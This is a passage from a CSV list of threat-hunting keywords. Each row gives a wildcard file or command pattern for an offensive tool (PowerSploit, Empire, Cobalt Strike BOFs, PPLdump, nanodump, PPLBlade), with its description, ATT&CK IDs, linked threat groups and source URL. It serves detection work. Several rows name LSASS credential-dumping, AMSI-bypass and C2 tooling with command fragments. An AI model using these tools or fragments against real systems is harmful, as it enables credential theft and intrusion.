PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://www.powershellempire.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PowerShellExecuter.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*powershell-import *.ps1*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*powershell-import*Invoke-Kerberoast.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell-import*ShareFinder.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PowershellKerberos-main*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*PowerShellMafia*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PowerShellMafia/PowerSCCM*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*PowerShellMafia/PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerShellObfuscator.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*PowershellRunner.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*PowerShellStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*PowerShell-Suite*","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2511","794","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z" +"*PowerShx.dll*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*PowerShx.exe*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*PowerShx.sln*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*PowerShxDll.csproj*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*PowerShx-master*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit-*.zip*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit/releases*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*powerstager*","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","2","181","59","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z" +"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerUpSQL*","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1087 - T1059 - T1003 - T1078 - T1053 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","2182","456","2023-06-27T02:42:35Z","2016-06-22T01:22:39Z" +"*PowerView.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*PowerView.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powerview.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerView.ps1*","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerView_dev.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*PowerView3-Aggressor*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*ppajinakbfocjfnijggfndbdmjggcmde*","greyware_tool_keyword","My Browser Vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ppenum.c*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" +"*ppenum.exe*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" +"*ppenum.x64.*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" +"*ppenum.x86.*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" +"*ppl* --elevate-handle *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*ppl_dump.x64*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*ppl_medic_dll.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*PPLBlade.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*PPLBlade.exe*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*PPLBlade-main.*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*ppldump *","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*PPLdump*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" +"*PPLdump.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" +"*ppldump.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*PPLDump_BOF.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's 